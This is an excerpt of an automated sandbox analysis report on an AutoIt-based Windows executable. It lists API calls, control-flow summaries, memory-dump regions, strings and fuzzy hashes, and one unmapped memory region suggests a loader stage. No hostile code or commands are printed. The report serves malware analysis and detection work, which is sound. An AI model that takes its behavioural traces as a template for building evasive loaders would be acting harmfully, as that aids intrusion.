                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                              • String ID:
                                              • API String ID: 1500180987-0
                                              • Opcode ID: c20255474d3bfcdb93c2cc4791eddd5ffed6a65fdfac98f318743ae2f6a23a2a
                                              • Instruction ID: fe89da570ea05df686e9d6f6d1018750074245d132b143f23584ddd579df2b31
                                              • Opcode Fuzzy Hash: c20255474d3bfcdb93c2cc4791eddd5ffed6a65fdfac98f318743ae2f6a23a2a
                                              • Instruction Fuzzy Hash: ABC129B1D00219ABDF21DFA5CC85AEEB7F9EF55310F0040EAF609E6151EB709A848F65

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00B54706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C152F8,?,00B537AE,?), ref: 00B54724
                                                • Part of subcall function 00B7050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00B57165), ref: 00B7052D
                                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00B571A8
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00B8E8C8
                                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00B8E909
                                              • RegCloseKey.ADVAPI32(?), ref: 00B8E947
                                              • _wcscat.LIBCMT ref: 00B8E9A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                              • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                              • API String ID: 2673923337-2727554177
                                              • Opcode ID: c2a024640af834db10de01c1b59ec6c1bc09d4812ca74a06097f9272253bfefe
                                              • Instruction ID: 95e4247cf390664c1cd1a98421725f11dc6e64cb45bb2b242dd18a93d69f0e41
                                              • Opcode Fuzzy Hash: c2a024640af834db10de01c1b59ec6c1bc09d4812ca74a06097f9272253bfefe
                                              • Instruction Fuzzy Hash: 41718E715093019EC310EF65E841BAFBBE8FF86350B4089AEF855872B0EB719948CB52

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00B53A50
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00B53A5F
                                              • LoadIconW.USER32(00000063), ref: 00B53A76
                                              • LoadIconW.USER32(000000A4), ref: 00B53A88
                                              • LoadIconW.USER32(000000A2), ref: 00B53A9A
                                              • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00B53AC0
                                              • RegisterClassExW.USER32(?), ref: 00B53B16
                                                • Part of subcall function 00B53041: GetSysColorBrush.USER32(0000000F), ref: 00B53074
                                                • Part of subcall function 00B53041: RegisterClassExW.USER32(00000030), ref: 00B5309E
                                                • Part of subcall function 00B53041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00B530AF
                                                • Part of subcall function 00B53041: LoadIconW.USER32(000000A9), ref: 00B530F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                              • String ID: #$0$AutoIt v3
                                              • API String ID: 2880975755-4155596026
                                              • Opcode ID: de126838c3da66eef181e169c60aecb6e1ee504400c18125f5930ab2becbad95
                                              • Instruction ID: bf476b22b2713d337e84bfe596b45cbaba645da199cf42a221af1dd8ddf54a63
                                              • Opcode Fuzzy Hash: de126838c3da66eef181e169c60aecb6e1ee504400c18125f5930ab2becbad95
                                              • Instruction Fuzzy Hash: 90212772905309EFEB10DFA4EC49BDD7BF0FB49711F00816AE500A72A1D7B55A448B84

                                              Control-flow Graph

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                              • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                              • API String ID: 1825951767-3513169116
                                              • Opcode ID: 0c21d5394ef0570bff6f998391bd297f753c781614a7885f4b02212773210e3c
                                              • Instruction ID: aa0e5034db6873fba490870bac995b4fc435fa5ef4e2a0c37e90ed15c4929c5e
                                              • Opcode Fuzzy Hash: 0c21d5394ef0570bff6f998391bd297f753c781614a7885f4b02212773210e3c
                                              • Instruction Fuzzy Hash: E7A15D7290021D9ADB05EBA0DC95BEEB7F8FF15741F4404EAE816B7291EF745A08CB60

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00B53074
                                              • RegisterClassExW.USER32(00000030), ref: 00B5309E
                                              • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00B530AF
                                              • LoadIconW.USER32(000000A9), ref: 00B530F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 975902462-1005189915
                                              • Opcode ID: cf101e31d55d54ceed5b3322889bf59afd932def85a222bd152f121fbd681172
                                              • Instruction ID: f2592dde1d8f4ead1a1041fd1c0a307f7c08d0e98946d9dccf54e014f753dbc9
                                              • Opcode Fuzzy Hash: cf101e31d55d54ceed5b3322889bf59afd932def85a222bd152f121fbd681172
                                              • Instruction Fuzzy Hash: 1A3105B294520AEFDB10CFA8E884BDDBBF0FB09310F14856AE581A72A0E7B54585CF51

                                              Control-flow Graph

                                              APIs
                                              • GetSysColorBrush.USER32(0000000F), ref: 00B53074
                                              • RegisterClassExW.USER32(00000030), ref: 00B5309E
                                              • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00B530AF
                                              • LoadIconW.USER32(000000A9), ref: 00B530F2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                              • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                              • API String ID: 975902462-1005189915
                                              • Opcode ID: a44db909cbd3b547b3d43918e7b9604076ab966de72c0f77615a0c7882d4e0de
                                              • Instruction ID: 1bc16959a85319d780181f76aca4d913680aa39920246f6309326c14814f60ce
                                              • Opcode Fuzzy Hash: a44db909cbd3b547b3d43918e7b9604076ab966de72c0f77615a0c7882d4e0de
                                              • Instruction Fuzzy Hash: CC21C5B5D55619EFEB00DFA4E849BEDBBF4FB09700F00812AF911A72A0EBB145448F95

                                              Control-flow Graph

                                              control_flow_graph 1015 1007fa0-1007ff2 call 1007ea0 CreateFileW 1018 1007ff4-1007ff6 1015->1018 1019 1007ffb-1008008 1015->1019 1020 1008154-1008158 1018->1020 1022 100800a-1008016 1019->1022 1023 100801b-1008032 VirtualAlloc 1019->1023 1022->1020 1024 1008034-1008036 1023->1024 1025 100803b-1008061 CreateFileW 1023->1025 1024->1020 1026 1008063-1008080 1025->1026 1027 1008085-100809f ReadFile 1025->1027 1026->1020 1029 10080a1-10080be 1027->1029 1030 10080c3-10080c7 1027->1030 1029->1020 1032 10080e8-10080ff WriteFile 1030->1032 1033 10080c9-10080e6 1030->1033 1034 1008101-1008128 1032->1034 1035 100812a-100814f CloseHandle VirtualFree 1032->1035 1033->1020 1034->1020 1035->1020
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 01007FE5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2131329969.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1007000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                              • Instruction ID: 522e93274f81fb7c53309dd3697c0bb6c76bf4feea5e6a0ee254badb62fe417f
                                              • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                              • Instruction Fuzzy Hash: 4F51F9B5A50248FBEF60DFA4CC49FDE77B8BF48700F108954F64AEA2C0DA7496448B64

                                              Control-flow Graph

                                              control_flow_graph 1055 b539d5-b53a45 CreateWindowExW * 2 ShowWindow * 2
                                              APIs
                                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00B53A03
                                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00B53A24
                                              • ShowWindow.USER32(00000000,?,?), ref: 00B53A38
                                              • ShowWindow.USER32(00000000,?,?), ref: 00B53A41
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: Window$CreateShow
                                              • String ID: AutoIt v3$edit
                                              • API String ID: 1584632944-3779509399
                                              • Opcode ID: 8b0d95a03384235277081aeb1b27a3e0f2e4928a18002e7cfbaa7c41fe3164ef
                                              • Instruction ID: 24ffe618c100a79ff6c8b84777bc8c3f9c69bca05c9fc2e01ecc738e02ac4767
                                              • Opcode Fuzzy Hash: 8b0d95a03384235277081aeb1b27a3e0f2e4928a18002e7cfbaa7c41fe3164ef
                                              • Instruction Fuzzy Hash: DAF03A76601690BEEA305B23AC08FBB6E7DE7C7F50B01802AB900A3270D6B10801CAB0

                                              Control-flow Graph

                                              control_flow_graph 1056 b5407c-b5416f (with out-of-line blocks b8d3c8-b8d41e): LoadStringW, Shell_NotifyIconW and internal calls b57a16, b57bcc, b57b2e, b56fe3, b72de0, b5454e, b72dbc, b55904, b57cab, b58047; node and edge listing omitted
                                              APIs
                                              • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00B8D3D7
                                                • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                              • _memset.LIBCMT ref: 00B540FC
                                              • _wcscpy.LIBCMT ref: 00B54150
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00B54160
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                              • String ID: Line:
                                              • API String ID: 3942752672-1585850449
                                              • Opcode ID: 281cd9cf18b7dc52a750a60aef78ebbdc68eabe6e3dc6a1aa3ab864676cb1b95
                                              • Instruction ID: 484226f92eddfd8a367e65c6d91033e9dfe0bc597b37224012add90c0b41b058
                                              • Opcode Fuzzy Hash: 281cd9cf18b7dc52a750a60aef78ebbdc68eabe6e3dc6a1aa3ab864676cb1b95
                                              • Instruction Fuzzy Hash: 7D31D072108705AED320EB60EC46FDB77D8EF84305F1085AAF985921E1EF70969CCB82

                                              Control-flow Graph

                                              control_flow_graph 1150 b7541d-b755e0: internal calls b78b28, b78db6, b72de0, b80ba7, b746e6, b80e5b, b80cc8; node and edge listing omitted
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                              • String ID:
                                              • API String ID: 1559183368-0
                                              • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                              • Instruction ID: 38f9f4307beecffcefa8249c5b8ec4e16dbd60b88c8a93fbd5e50c39494d654b
                                              • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                              • Instruction Fuzzy Hash: 6351A370A00B059BDB349F69D88066E77E6EF50321F24C7A9F83D962D4D7B1DE909B40
                                              APIs
                                                • Part of subcall function 00B54DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54E0F
                                              • _free.LIBCMT ref: 00B8E263
                                              • _free.LIBCMT ref: 00B8E2AA
                                                • Part of subcall function 00B56A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00B56BAD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: _free$CurrentDirectoryLibraryLoad
                                              • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                              • API String ID: 2861923089-1757145024
                                              • Opcode ID: f099eee9783d550136962053b6d18631607dc0c79cf1198fa24dec0a01677dba
                                              • Instruction ID: e261935bf06c1e00a5082cf2a2a665a56a1b4870f0c89e8d1e87647d1f326790
                                              • Opcode Fuzzy Hash: f099eee9783d550136962053b6d18631607dc0c79cf1198fa24dec0a01677dba
                                              • Instruction Fuzzy Hash: 88916D719142199FCF14EFA4CC929EDB7F4FF09311B1044AAF826AB2A1DB70E945CB50
                                              APIs
                                                • Part of subcall function 01009950: Sleep.KERNELBASE(000001F4), ref: 01009961
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01009B6B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2131329969.0000000001007000.00000040.00000020.00020000.00000000.sdmp, Offset: 01007000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_1007000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CreateFileSleep
                                              • String ID: 8VIBXL00WBQSJQJ
                                              • API String ID: 2694422964-822010546
                                              • Opcode ID: e7ff5be01e2585babea1e6856b9219b47a3c41df6653cdb419f0c3404d6d8e59
                                              • Instruction ID: 762a38620ab55ea60b6dbe7ec3de3450ed5108cb082a17facebd82ce97052e6d
                                              • Opcode Fuzzy Hash: e7ff5be01e2585babea1e6856b9219b47a3c41df6653cdb419f0c3404d6d8e59
                                              • Instruction Fuzzy Hash: 7851A231D04249DBEF12DBA4C914BEFBBB4AF08304F004198E648BB2C1D7791B49CBA5
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00B535A1,SwapMouseButtons,00000004,?), ref: 00B535D4
                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00B535A1,SwapMouseButtons,00000004,?,?,?,?,00B52754), ref: 00B535F5
                                              • RegCloseKey.KERNELBASE(00000000,?,?,00B535A1,SwapMouseButtons,00000004,?,?,?,?,00B52754), ref: 00B53617
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID: Control Panel\Mouse
                                              • API String ID: 3677997916-824357125
                                              • Opcode ID: 74f63551e2a75947e93d66876ef58deea8f394429c4f82503ea6b350ddca01df
                                              • Instruction ID: b59badd1e5f55a4ff5b5f03a3ae71123aa34d1db9d58d24c919c5b9ac5bb3f4d
                                              • Opcode Fuzzy Hash: 74f63551e2a75947e93d66876ef58deea8f394429c4f82503ea6b350ddca01df
                                              • Instruction Fuzzy Hash: 17114871519209BFDB208F64DC80ABEB7F8EF04B81F0084AAF805D7310E6719E549760
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                              • String ID:
                                              • API String ID: 2782032738-0
                                              • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                              • Instruction ID: 2af298497ab0877867d5e0a62d4f3379a925012c12cb560e94a46984c847d75b
                                              • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                              • Instruction Fuzzy Hash: 38419375B007499BDB1C8E69C8809AE7BE5EF46362B24C5BDE83DCB640EB70DD418B41
                                              APIs
                                              • _memset.LIBCMT ref: 00B8EA39
                                              • 75D3D0D0.COMDLG32(?), ref: 00B8EA83
                                                • Part of subcall function 00B54750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00B54743,?,?,00B537AE,?), ref: 00B54770
                                                • Part of subcall function 00B70791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B707B0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2129821939.0000000000B51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                              • Associated: 00000000.00000002.2129795167.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C04000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C0E000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000C2F000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2129821939.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130115710.0000000000CB2000.00000080.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CB3000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2130165337.0000000000CCB000.00000004.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_b50000_l1QC9H0SNR.jbxd
                                              Similarity
                                              • API ID: NamePath$FullLong_memset
                                              • String ID: X
                                              • API String ID: 3051022977-3081909835
                                              • Opcode ID: 8041893aa20d719217cf31e2a1087b83b88535ff46e7c2fd249c2424a72d067b
